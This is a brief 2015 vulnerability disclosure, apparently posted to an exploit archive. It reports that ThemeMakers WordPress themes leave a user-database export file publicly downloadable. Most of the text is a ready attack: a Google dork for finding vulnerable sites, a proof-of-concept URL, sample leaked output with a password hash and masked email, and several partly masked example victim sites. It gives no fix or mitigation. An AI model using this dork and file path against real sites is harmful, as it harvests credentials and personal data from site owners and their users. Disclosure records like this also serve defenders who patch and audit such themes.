# WordPress 'ALL Themes' Developed By "ThemeMakers" File Information Exposure # CWE: CWE-538 # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 15/05/2015 # Vendor Homepage: http://themeforest.net/user/ThemeMakers/portfolio (ALL THEMES) # Google Dork: inurl:/wp-content/uploads/tmm_db_migrate/ # PoC : http://SITE.com/wp-content/uploads/tmm_db_migrate/wp_users.dat Target File: wp_users.dat array ( 0 => array ( 'ID' => '1', 'user_login' => 'xxxxxx', 'user_pass' => '$P$B5GFS1KH2VkkSZhAOAu0MT.XbNtZ1Q0', 'user_nicename' => '', 'user_email' => 'xxxxx@gmail.com', 'user_url' => '', 'user_registered' => '2014-05-06 13:22:47', 'user_activation_key' => '', 'user_status' => '0', 'display_name' => '', ), ) # Examples: http://ibermallXa.com/wp-content/uploads/tmm_db_migrate/wp_users.dat http://bdfotXo.net/wp-content/uploads/tmm_db_migrate/wp_users.dat http://www.cXy-play.com/wp-content/uploads/tmm_db_migrate/wp_users.dat # Themes Probably Affected: Diplomat | Political WordPress Theme Car Dealer / Auto Dealer Responsive WP Theme Invento Responsive Gallery/Architecture Template Accio One Page Parallax Responsive WordPress Theme Accio Responsive Parallax One Page Site Template Axioma Premium Responsive WordPress Theme Almera Responsive Portfolio WordPress Theme Almera Responsive Portfolio Site Template Goodnex Premium Responsive WordPress Theme GamesTheme Premium WordPress Theme Blessing Premium Responsive WordPress Theme SmartIT Premium Responsive WordPress Theme ....